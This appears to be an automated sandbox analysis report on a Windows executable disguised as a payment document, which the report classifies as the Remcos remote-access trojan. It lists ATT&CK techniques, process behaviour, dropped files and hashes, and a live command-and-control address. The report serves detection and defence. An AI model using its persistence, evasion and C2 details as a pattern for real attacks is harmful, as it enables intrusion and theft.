            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 311 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 212 Process Injection | 41 Obfuscated Files or Information | 2 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 311 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Scheduled Task/Job | 12 Software Packing | NTDS | 33 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1465312. Sample: e-Payment.NET.CMS4006975815.exe. Start date: 01/07/2024. Architecture: WINDOWS. Score: 100
            Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 14 other signatures
            Process e-Payment.NET.CMS4006975815.exe (started)
              Dropped: C:\Users\user\AppData\...\JXHPwNYzysUjKo.exe (PE32); C:\...\JXHPwNYzysUjKo.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpD623.tmp (XML); C:\...\e-Payment.NET.CMS4006975815.exe.log (ASCII)
              Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
              Child processes: e-Payment.NET.CMS4006975815.exe (second instance; connects to 62.102.148.166:3319 from local ports 49707 and 49710, TEKNIKBYRANSE, Sweden; Installs a global keyboard hook); powershell.exe (Loading BitLocker PowerShell Module; child processes WmiPrvSE.exe and conhost.exe); powershell.exe (child process conhost.exe); schtasks.exe (child process conhost.exe)
            Process JXHPwNYzysUjKo.exe (started)
              Dropped: C:\Users\user\...\JXHPwNYzysUjKo.exe.log (ASCII)
              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected Remcos RAT; 7 other signatures
              Child processes: JXHPwNYzysUjKo.exe (Detected Remcos RAT; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)); schtasks.exe (child process conhost.exe)

            Source | Detection | Scanner | Label
            e-Payment.NET.CMS4006975815.exe | 42% | ReversingLabs | Win32.Backdoor.Remcos
            e-Payment.NET.CMS4006975815.exe | 100% | Avira | HEUR/AGEN.1308647
            e-Payment.NET.CMS4006975815.exe | 100% | Joe Sandbox ML |
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | 100% | Avira | HEUR/AGEN.1308647
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | 42% | ReversingLabs | Win32.Backdoor.Remcos
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            62.102.148.166 | 0% | Avira URL Cloud | safe
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            62.102.148.166 | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002841000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            62.102.148.166 | unknown | Sweden | 51815 | TEKNIKBYRANSE | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1465312
            Start date and time:2024-07-01 15:12:54 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 25s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:19
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:e-Payment.NET.CMS4006975815.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@19/16@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 64
            • Number of non-executed functions: 114
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes were analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: e-Payment.NET.CMS4006975815.exe
            Time | Type | Description
            09:13:47 | API Interceptor | 11268470x Sleep call for process: e-Payment.NET.CMS4006975815.exe modified
            09:13:49 | API Interceptor | 33x Sleep call for process: powershell.exe modified
            09:13:52 | API Interceptor | 2x Sleep call for process: JXHPwNYzysUjKo.exe modified
            14:13:50 | Task Scheduler | Run new task: JXHPwNYzysUjKo path: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            62.102.148.166 | GST Challan.pdf.exe | malicious | Remcos |
            62.102.148.166 | 845c3ba76768948ab3df490599f02d060cd464c6251e16e7847d53707254ee46_dump.exe | malicious | Remcos |
            62.102.148.166 | Challan copy.pdf.exe | malicious | Remcos |
            62.102.148.166 | Property document.pdf.exe | malicious | Remcos |
            62.102.148.166 | ICICI Ref No. CMS4213872601.pdf.exe | malicious | Remcos |
            62.102.148.166 | GST e-Payment.NET.CMS4006900371.exe | malicious | Remcos |
            62.102.148.166 | M3s8X1ORFt.exe | malicious | Unknown |
            62.102.148.166 | lib64.exe | malicious | Unknown |
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            TEKNIKBYRANSE | GST Challan.pdf.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | 845c3ba76768948ab3df490599f02d060cd464c6251e16e7847d53707254ee46_dump.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | Challan copy.pdf.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | Property document.pdf.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | ICICI Ref No. CMS4213872601.pdf.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | GST e-Payment.NET.CMS4006900371.exe | malicious | Remcos | 62.102.148.166
            TEKNIKBYRANSE | 2rMV8dDPMo.exe | malicious | Remcos, PureLog Stealer | 62.102.148.185
            TEKNIKBYRANSE | HwyuZkjbDs.exe | malicious | Remcos | 62.102.148.189
            TEKNIKBYRANSE | e-Payment Challan.Net.CMS4006975825.exe | malicious | Remcos | 62.102.148.185
            TEKNIKBYRANSE | GST e-Payment Challan.exe | malicious | Remcos, PureLog Stealer | 62.102.148.185
            No context
            No context
                            Process:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2232
                            Entropy (8bit):5.380747059108785
                            Encrypted:false
                            SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyufF:lGLHxvIIwLgZ2KRHWLOugbfF
                            MD5:4A02B86CF7B2EB5514FECA1C0B114C79
                            SHA1:0361A50A97DFE42E7E55A449C79C9B6F27CDA9AC
                            SHA-256:7DE2629DC87244025359CEB352F3DB49E824665DA5A22BD2A808A507D995856D
                            SHA-512:3DE90A07BCCBD60FE1388C7CDBFEEC8BB323B4797D6DE46ACD770809CF0856098057BE16E5CAA3B69CFF25A33AAB696445A223994964B002F8CB6AF9F041FB23
                            Malicious:false
                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1573
                            Entropy (8bit):5.108862566319255
                            Encrypted:false
                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewWv:HeLwYrFdOFzOz6dKrsuqX
                            MD5:FB065A253D6FF24763C889638A255D60
                            SHA1:D23343AA772A4615A592715F14D938BDC81D32EA
                            SHA-256:D2609CEFD53BB9542DD4F58FDA0A9FF374D1DCFF2CCF6C2F2CF0E0918B17FDE8
                            SHA-512:EF1F6C5F524E8E2FBC5E9FBEDE504D37B0835BB3F1CF5DF482638186098CA359269F208B79BD1256EDB9ECD2F44D99615EE3901899EBB666AAED4501E0ED751C
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                            Process:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1573
                            Entropy (8bit):5.108862566319255
                            Encrypted:false
                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewWv:HeLwYrFdOFzOz6dKrsuqX
                            MD5:FB065A253D6FF24763C889638A255D60
                            SHA1:D23343AA772A4615A592715F14D938BDC81D32EA
                            SHA-256:D2609CEFD53BB9542DD4F58FDA0A9FF374D1DCFF2CCF6C2F2CF0E0918B17FDE8
                            SHA-512:EF1F6C5F524E8E2FBC5E9FBEDE504D37B0835BB3F1CF5DF482638186098CA359269F208B79BD1256EDB9ECD2F44D99615EE3901899EBB666AAED4501E0ED751C
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):771584
                            Entropy (8bit):7.734947931218711
                            Encrypted:false
                            SSDEEP:12288:ArwE8GILjWLWg7DTBCZrWvGYjS/9ofzvOW4J9gAlMTAq9Ys2D485eP4sSEAmD:tc7vB2AS/9c2WkgAwAq2s0N5e6
                            MD5:B16699F8FD5E68DE16D8904EC7CD3ED2
                            SHA1:45FAC6B1832FAD2FEF90E1064AB4E78E0B164737
                            SHA-256:D21D0451A7A8B112776118D88154BF7EAB2703B13BF6AE1DCAEC2F959BF42305
                            SHA-512:65F6A8A1899CAAB9AA2F120F880736B92617E9AD0F8C033C0F7C194D3E0A51CD90EA98F5C63BEB6BE213689CAD74AF7630360E0C882B8A0BFC2D7040943B5297
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 42%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..............0.................. ........@.. ....................... ............@.................................P...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........... \......2.......P...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):159
                            Entropy (8bit):4.421936275604687
                            Encrypted:false
                            SSDEEP:3:M1XKe3ooDHn/iuFMIFDKXFZZ1vl7Hn/iuFMIFDKXFj0R21vl7Hn/iuFMIFDKXFEA:0au1TDMFv1vx1TDMFIU1vx1TDMFEHU1v
                            MD5:121AD0A65493936BC04F8469291ED3C4
                            SHA1:56CA2033FA0B7703F1A383EEB06022A3D44DB027
                            SHA-256:8905303413FCCD22F60E8C149970BFB5ADA50FC17EC26C71CE6949AD78703C2C
                            SHA-512:497ED36AC9B90248FAD67A8CEA828CD654C7876C0DB6C7FE08A2487D50E306FA35BC89AC71229086A59F730CF5726025FEC88EEDD373730E1329B995386591BE
                            Malicious:false
                            Preview:...[ Program Manager ]......{ User has been idle for 0 minutes }......{ User has been idle for 70179 minutes }......{ User has been idle for 68123 minutes }...
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.734947931218711
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:e-Payment.NET.CMS4006975815.exe
                            File size:771'584 bytes
                            MD5:b16699f8fd5e68de16d8904ec7cd3ed2
                            SHA1:45fac6b1832fad2fef90e1064ab4e78e0b164737
                            SHA256:d21d0451a7a8b112776118d88154bf7eab2703b13bf6ae1dcaec2f959bf42305
                            SHA512:65f6a8a1899caab9aa2f120f880736b92617e9ad0f8c033c0f7c194d3e0a51cd90ea98f5c63beb6be213689cad74af7630360e0c882b8a0bfc2d7040943b5297
                            SSDEEP:12288:ArwE8GILjWLWg7DTBCZrWvGYjS/9ofzvOW4J9gAlMTAq9Ys2D485eP4sSEAmD:tc7vB2AS/9c2WkgAwAq2s0N5e6
